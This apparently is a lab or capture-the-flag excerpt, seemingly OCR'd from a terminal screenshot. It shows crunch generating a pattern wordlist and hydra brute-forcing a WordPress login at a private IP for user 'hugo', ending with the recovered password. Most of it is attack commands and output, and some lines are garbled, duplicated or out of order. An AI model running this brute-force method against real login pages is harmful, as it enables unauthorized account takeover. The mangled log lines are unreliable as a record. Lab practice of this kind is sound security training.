Password: supnum2059\$

```
<u>mot@kali</u>)-[/home/kali]
          crunch 11 11 0123456789 -t "supnum2000\$" -o password.txt
Crunch will now generate the following amount of data: 1200 bytes
0 GB
    TB
   PB
Crunch will now generate the following number of lines: 100
crunch: 100% completed generating output
                  ot®kali)-[/home/kali]
           nano wp.txt
           hydra -f -L wp.txt -P password.txt 192.168.63.109 -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log
  Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or fo
   nd ethics anyway).
  Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-04-17 08:32:31

[DATA] max 16 tasks per 1 server, overall 16 tasks, 100 login tries (l:1/p:100), ~7 tries per task

[DATA] attacking http-post-form://192.168.63.109:80/wp-login.php:log=^USER^5pwd=^PASS^5wp-submit=Log In&testcookie=1:S=locati

[ATTEMPT] target 192.168.63.109 - login "hugo" - pass "supnum2000$" - 1 of 100 [child 0] (0/0)

[ATTEMPT] target 192.168.63.109 - login "hugo" - pass "supnum2001$" - 2 of 100 [child 1] (0/0)

[ATTEMPT] target 192.168.63.109 - login "hugo" - pass "supnum2002$" - 3 of 100 [child 2] (0/0)

[ATTEMPT] target 192.168.63.109 - login "hugo" - pass "supnum2003$" - 4 of 100 [child 3] (0/0)

[ATTEMPT] target 192.168.63.109 - login "hugo" - pass "supnum2005$" - 6 of 100 [child 4] (0/0)

[ATTEMPT] target 192.168.63.109 - login "hugo" - pass "supnum2005$" - 6 of 100 [child 5] (0/0)

[ATTEMPT] target 192.168.63.109 - login "hugo" - pass "supnum2006$" - 7 of 100 [child 6] (0/0)

[ATTEMPT] target 192.168.63.109 - login "hugo" - pass "supnum2007$" - 8 of 100 [child 7] (0/0)

[ATTEMPT] target 192.168.63.109 - login "hugo" - pass "supnum2009$" - 9 of 100 [child 7] (0/0)

[ATTEMPT] target 192.168.63.109 - login "hugo" - pass "supnum2009$" - 9 of 100 [child 9] (0/0)

[ATTEMPT] target 192.168.63.109 - login "hugo" - pass "supnum2009$" - 10 of 100 [child 10] (0/0)

[ATTEMPT] target 192.168.63.109 - login "hugo" - pass "supnum2009$" - 10 of 100 [child 10] (0/0)
   Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-04-17 08:32:31
                                                                                                                                                                                        [child 9] (0/0)
[child 10] (0/0)
[child 11] (0/0)
[child 12] (0/0)
                                                                                                             - pass "supnum2010$" - 11 of 100

- pass "supnum2011$" - 12 of 100

- pass "supnum2012$" - 13 of 100

- pass "supnum2013$" - 14 of 100

- pass "supnum2014$" - 15 of 100
                                                                               login "hugo"
    [ATTEMPT]
                         target 192.168.63.109 -
   [ATTEMPT] target 192.168.63.109 - login "hugo"
[ATTEMPT] target 192.168.63.109 - login "hugo"
[ATTEMPT] target 192.168.63.109 - login "hugo"
                                                                                                                                                                                                                  (0/0)
(0/0)
                                                                                                                                                                                          [child
                                                                                                                                                                                         [child 14]
  [ATTEMPT] target 192.108.03.109 - togin mugo - pass supnum2052$ - 55 of 100 [child 12] (0/0) [ATTEMPT] target 192.168.63.109 - login "hugo" - pass "supnum2053$" - 54 of 100 [child 12] (0/0) [ATTEMPT] target 192.168.63.109 - login "hugo" - pass "supnum2054$" - 55 of 100 [child 10] (0/0) [ATTEMPT] target 192.168.63.109 - login "hugo" - pass "supnum2055$" - 56 of 100 [child 11] (0/0)
                         target 192.168.63.109 - login "hugo" - pass "supnum2055$" - 56 of 100 [child 11] (0/0) target 192.168.63.109 - login "hugo" - pass "supnum2056$" - 57 of 100 [child 6] (0/0) target 192.168.63.109 - login "hugo" - pass "supnum2057$" - 58 of 100 [child 13] (0/0) target 192.168.63.109 - login "hugo" - pass "supnum2058$" - 59 of 100 [child 5] (0/0) target 192.168.63.109 - login "hugo" - pass "supnum2059$" - 60 of 100 [child 2] (0/0) target 192.168.63.109 - login "hugo" - pass "supnum2060$" - 61 of 100 [child 7] (0/0)
  [ATTEMPT]
  [ATTEMPT]
   [ATTEMPT]
   [ATTEMPT]
                           target 192.168.63.109 - login "hugo" - pass "supnum2061$" - 62 of 100 [child 14] (0/0)
   [ATTEMPT]
                                                                                        login "hugo" - pass "supnum2001$ - 62 of 100 [child 14] (0/0) login "hugo" - pass "supnum2062$" - 63 of 100 [child 1] (0/0) login "hugo" - pass "supnum2063$" - 64 of 100 [child 15] (0/0)
                           target 192.168.63.109 -
   [ATTEMPT]
                          target 192.168.63.109 -
  [ATTEMPT]
                          target 192.168.63.109 - login 'hugo' - pass "supnum2064$" - 65 of 100 [child 8] (0/0) target 192.168.63.109 - login 'hugo' - pass "supnum2065$" - 66 of 100 [child 0] (0/0) target 192.168.63.109 - login 'hugo' - pass "supnum2066$" - 67 of 100 [child 9] (0/0) target 192.168.63.109 - login 'hugo' - pass "supnum2066$" - 67 of 100 [child 4] (0/0) target 192.168.63.109 - login 'hugo' - pass "supnum2066$" - 68 of 100 [child 4] (0/0)
  [ATTEMPT]
[ATTEMPT]
   [ATTEMPT]
  [ATTEMPT]
                           target 192.168.63.109 - login "hugo" - pass "supnum2068$" - 69 of 100 [child 12] (0/0)
   [ATTEMPT]
                          target 192.108.03.109 - login flugo - pass suprimize - 09 of 100 [child 12] (0/0) target 192.168.63.109 - login "hugo" - pass "suprim2069$" - 70 of 100 [child 3] (0/0) target 192.168.63.109 - login "hugo" - pass "suprim2070$" - 71 of 100 [child 10] (0/0)
   [ATTEMPT]
  [ATTEMPT]
  [ATTEMPT] target 192.168.63.109 - login "hugo" - pass "supnum2071$" - 72 of 100 [child 6] (0/0) 
[ATTEMPT] target 192.168.63.109 - login "hugo" - pass "supnum2072$" - 73 of 100 [child 11] (0/0)
  [ATTEMPT] target 192.168.63.109 - login "hugo" - pass "supnum2073$" - 74 of 100 [child 7] (0/0)
[ATTEMPT] target 192.168.63.109 - login "hugo" - pass "supnum2074$" - 75 of 100 [child 1] (0/0)
  [ATTEMPT] target 192.168.63.109 - login "hugo" - pass "supnum2075$" - 76 of 100 [child 5] (0/0)
  [80][http-post-form] host: 192.168.63.109 login: hugo password: supnum2059$
[STATUS] attack finished for 192.168.63.109 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-04-17 08:32:35
```